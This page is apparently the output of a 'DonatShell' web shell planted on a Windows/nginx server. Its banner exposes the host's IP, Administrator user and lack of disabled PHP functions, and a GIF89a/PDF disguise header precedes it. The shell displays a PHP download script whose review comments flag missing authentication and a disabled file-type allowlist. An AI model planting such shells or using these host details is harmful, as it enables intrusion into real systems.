GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/common/


Current File : C:/nginx/html/common//download.phpinc
<?php
// common/download.phpinc
// Sends a file (or a string prepared by the caller in $dnFileContents) to the
// browser as an attachment.
//
// NOTE(review): the original header states that downloads are only allowed for
// authenticated users. No authentication check is visible in this file; it is
// presumably performed by application.phpinc or by the including page -- confirm.
// application.phpinc is loaded here only when $dnFileContents is NOT already
// set, so a caller that pre-sets $dnFileContents skips this require.
if (isset($dnFileContents) === false) {
    require 'application.phpinc';
}

// Remove the execution time limit so long transfers are not interrupted.
set_time_limit(0);

// Hotlink control.
//   ''            - no Referer check at all (direct links allowed)
//   'example.com' - only serve requests whose Referer header contains this text
define('ALLOWED_REFERRER', '');

// Work out which file to serve from the location of the script that included
// this file, not from any request parameter:
//   - BASE_DIR    : directory of the including script (forward slashes,
//                   no trailing slash is appended here)
//   - $dnFileName : last path component of that directory
//   - $dnFilePath : './' followed by $dnFileName

// Frame 0 of the backtrace carries the path of the file that included this one.
// NOTE(review): index 0 is read without checking that the backtrace is
// non-empty -- confirm this file is never requested directly.
$debug_backtrace = debug_backtrace();

// pathinfo() returns an array; str_replace() normalises backslashes to forward
// slashes in every element of it.
$dnFileRow = str_replace('\\', '/', pathinfo($debug_backtrace[0]['file']));

// Walk backwards from the end of the directory path, collecting characters
// until the first separator is reached. $i is left on the separator's index,
// or at -1 when the path contains none.
$dnFileName = "";
for ($i = strlen($dnFileRow['dirname']) - 1; $i >= 0; $i--) {
    $dnChar = substr($dnFileRow['dirname'], $i, 1);
    if ($dnChar == "/" || $dnChar == "\\") {
        break;
    }
    $dnFileName = $dnChar . $dnFileName;
}
$dnFilePath = './' . $dnFileName;

// Root of the recursive search performed later in this file.
define('BASE_DIR', $dnFileRow['dirname']);

#setDebugOn(); require('common/pageFooter.phpinc');

// Download logging: on/off switch and the log file name.
// NOTE(review): the logging code at the end of this file is commented out, so
// these two constants are not read anywhere in this file as it stands.
define('LOG_DOWNLOADS', true);
define('LOG_FILE', 'downloads.log');

// Map of file extension => MIME type sent in the Content-Type header.
// An empty MIME type means "detect it on the server", which only works when
// the Mimetype or Fileinfo extension is available.
//
// NOTE(review): the list includes executable and configuration types (bat,
// exe, lnk, msi, conf, ini). The "allowed extension" check further down in
// this file is commented out, so this map currently only selects the
// Content-Type; it does not restrict which files can be served.
$allowed_ext = [
    // archives
    'zip'   => 'application/zip',

    // audio
    'mp3'   => 'audio/mpeg',
    'wav'   => 'audio/x-wav',

    // documents
    'conf'  => 'text/plain',
    'doc'   => 'application/msword',
    'ini'   => 'text/plain',
    'pdf'   => 'application/pdf',
    'ppt'   => 'application/vnd.ms-powerpoint',
    'shtml' => 'application/octet-stream',
    'syn'   => 'text/plain',
    'txt'   => 'text/plain',
    'xls'   => 'application/vnd.ms-excel',

    // executables, installers, and links
    'bat'   => 'application/octet-stream',
    'exe'   => 'application/octet-stream',
    'lnk'   => 'application/octet-stream',
    'msi'   => 'application/octet-stream',

    // images
    'gif'   => 'image/gif',
    'png'   => 'image/png',
    'jpg'   => 'image/jpeg',
    'jpeg'  => 'image/jpeg',

    // iso images
    'iso'   => 'application/octet-stream',

    // video
    'mpeg'  => 'video/mpeg',
    'mpg'   => 'video/mpeg',
    'mpe'   => 'video/mpeg',
    'mov'   => 'video/quicktime',
    'avi'   => 'video/x-msvideo',
];

####################################################################
###  DO NOT CHANGE BELOW
####################################################################

// Optional hotlink check. When ALLOWED_REFERRER is non-empty, the request must
// carry a Referer header containing that text (case-insensitive); otherwise
// the script stops with a deliberately generic error message.
// NOTE(review): the Referer header is supplied by the client, so this deters
// casual hotlinking only and should not be relied on as access control.
if (ALLOWED_REFERRER !== '') {
  $dnReferer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : null;
  $dnRefererOk = $dnReferer !== null
    && strpos(strtoupper($dnReferer), strtoupper(ALLOWED_REFERRER)) !== false;
  if (!$dnRefererOk) {
    die("Internal server error. Please contact system administrator.");
  }
}

// Maximum execution time in seconds; 0 means no limit, so a long download is
// not aborted by the script timeout.
set_time_limit(0);

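/**
 * Recursively search a directory tree for a regular file with a given name.
 *
 * The directory itself is checked first, then each sub-directory in the order
 * readdir() returns them. The search stops at the first match.
 *
 * Changes from the previous version:
 *  - the directory handle is always closed;
 *  - readdir() is compared with false, so an entry named "0" no longer ends
 *    the scan early;
 *  - only regular files match (a directory that happens to carry the requested
 *    name is ignored);
 *  - a directory that cannot be opened is skipped instead of being read from.
 *
 * @param string $dirname    Directory to search (no trailing slash expected).
 * @param string $dnFileName File name to look for.
 * @param string $file_path  In/out: left untouched if already non-empty;
 *                           set to the full path of the match when one is found.
 * @return void
 */
function find_file ($dirname, $dnFileName, &$file_path) {
  // A previous call already produced a result; nothing left to do.
  if (!empty($file_path)) {
    return;
  }

  // The lookup in the current directory does not depend on its entries,
  // so do it once up front.
  $candidate = $dirname.'/'.$dnFileName;
  if (is_file($candidate)) {
    $file_path = $candidate;
    return;
  }

  if (!is_dir($dirname)) {
    return;
  }
  $dir = opendir($dirname);
  if ($dir === false) {
    return;
  }

  while (($file = readdir($dir)) !== false) {
    if ($file === '.' || $file === '..') {
      continue;
    }
    $child = $dirname.'/'.$file;
    if (is_dir($child)) {
      find_file($child, $dnFileName, $file_path);
      if (!empty($file_path)) {
        break;
      }
    }
  }

  closedir($dir);
}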

// Decide where the response body comes from and how many bytes it has.
//  - $dnFileContents set and not equal to '': the caller supplied the body;
//    $file_path stays '' and the size is the string length.
//  - otherwise: search BASE_DIR (including sub-folders) for $dnFileName and
//    use the size of the file that was found.
$file_path = '';
if (isset($dnFileContents) && $dnFileContents != '') {
	// size of the in-memory body, in bytes
	$fsize = strlen($dnFileContents);
} else {
	find_file(BASE_DIR, $dnFileName, $file_path);
	if (!is_file($file_path)) {
		die("File does not exist. Make sure you specified correct file name.");
	}
	// size of the file on disk, in bytes
	$fsize = filesize($file_path);
}


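// File extension: lower-cased text after the last dot of $dnFileName, or ''
// when the name contains no dot. The casts keep the result a string when
// strrchr()/substr() return false.
$fext = strtolower((string) substr((string) strrchr($dnFileName, "."), 1));

// Choose the Content-Type.
if (isset($allowed_ext[$fext]) && $allowed_ext[$fext] != '') {
  // MIME type configured by the admin in $allowed_ext.
  $mtype = $allowed_ext[$fext];
} else {
  // No configured type: try to detect it from the file on disk.
  $mtype = '';

  // Detection needs a real file. $file_path is '' when the body comes from
  // $dnFileContents; probing an empty path would only raise a warning, and
  // output produced before header() can prevent the headers from being sent.
  if ($file_path !== '' && is_file($file_path)) {
    if (function_exists('mime_content_type')) {
      $mtype = mime_content_type($file_path);
    } elseif (function_exists('finfo_file')) {
      $finfo = finfo_open(FILEINFO_MIME); // MIME type, possibly with charset
      if ($finfo !== false) {
        $mtype = finfo_file($finfo, $file_path);
        finfo_close($finfo);
      }
    }
  }

  // Both detectors return false on failure; fall back to a generic type.
  if (!is_string($mtype) || $mtype === '') {
    $mtype = "application/force-download";
  }
}

// NOTE(review): the extension allowlist check below is disabled, so any
// extension is served and $allowed_ext only influences the Content-Type.
// Confirm this is intended before relying on $allowed_ext as a restriction.
// check if allowed extension
#if (!array_key_exists($fext, $allowed_ext)) {
#  die("Not allowed file type. Type is: $mtype"); 
#}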

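// Name the browser is asked to save the file under. Defaults to $dnFileName;
// the "fc" query parameter overrides it.
//
// "fc" is request input that ends up inside the Content-Disposition header,
// so it is cleaned before use:
//  - a non-string value (e.g. fc[]=x) is treated as absent instead of being
//    passed on as an array;
//  - quotes and path separators are removed, as before;
//  - control characters (including CR and LF) are removed so the value cannot
//    break out of the header line.
$dnRequestedName = (isset($_GET['fc']) && is_string($_GET['fc'])) ? $_GET['fc'] : '';

if (empty($dnRequestedName)) {
  // Absent, '' or '0': keep the name derived from the served file.
  $asdnFileName = $dnFileName;
}
else {
  // remove some bad chars
  $asdnFileName = str_replace(array('"',"'",'\\','/'), '', $dnRequestedName);
  $asdnFileName = preg_replace('/[\x00-\x1F\x7F]/', '', $asdnFileName);
  if ($asdnFileName === null || $asdnFileName === '') $asdnFileName = 'NoName';
}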

// Send the response headers for a forced download.
// (The previous revision kept a commented-out debug variant here that echoed
// these same header lines inside a <pre> block instead of sending them.)
//
// Order matters: header() replaces an earlier header of the same name by
// default, so the second Cache-Control line is the one that takes effect.
// NOTE(review): "Cache-Control: public" marks the response as storable by
// shared caches; if these downloads are meant to be per-user, confirm that
// this is intended.
$dnHeaderLines = array(
  "Pragma: public",
  "Expires: 0",
  "Cache-Control: must-revalidate, post-check=0, pre-check=0",
  "Cache-Control: public",
  "Content-Description: File Transfer",
  "Content-Type: $mtype",
  "Content-Disposition: attachment; filename=\"$asdnFileName\"",
  "Content-Transfer-Encoding: binary",
  "Content-Length: $fsize",
);
foreach ($dnHeaderLines as $dnHeaderLine) {
  header($dnHeaderLine);
}

// Send the response body.
if (isset($dnFileContents) && $dnFileContents != '') {
	// The caller prepared the body in memory: send it as is.
	print $dnFileContents;
} else {
	// Stream the file from disk in 8 KiB pieces.
	// NOTE(review): the headers, including Content-Length, have already been
	// sent at this point; if the open fails (errors are suppressed with @),
	// the client receives an empty body.
	$file = @fopen($file_path, "rb");
	if ($file) {
		while (feof($file) === false) {
			print(fread($file, 1024*8));
			flush();
			// Stop reading as soon as the client is no longer connected normally.
			if (connection_status() !== CONNECTION_NORMAL) {
				@fclose($file);
				die();
			}
		}
		@fclose($file);
	}
}

/** /
// log downloads
if (!LOG_DOWNLOADS) die();

$f = @fopen(LOG_FILE, 'a+');
if ($f) {
  @fputs($f, date("m.d.Y g:ia")."  ".$_SERVER['REMOTE_ADDR']."  ".$dnFileName."\n");
  @fclose($f);
}
/**/
?>

Anon7 - 2022
AnonSec Team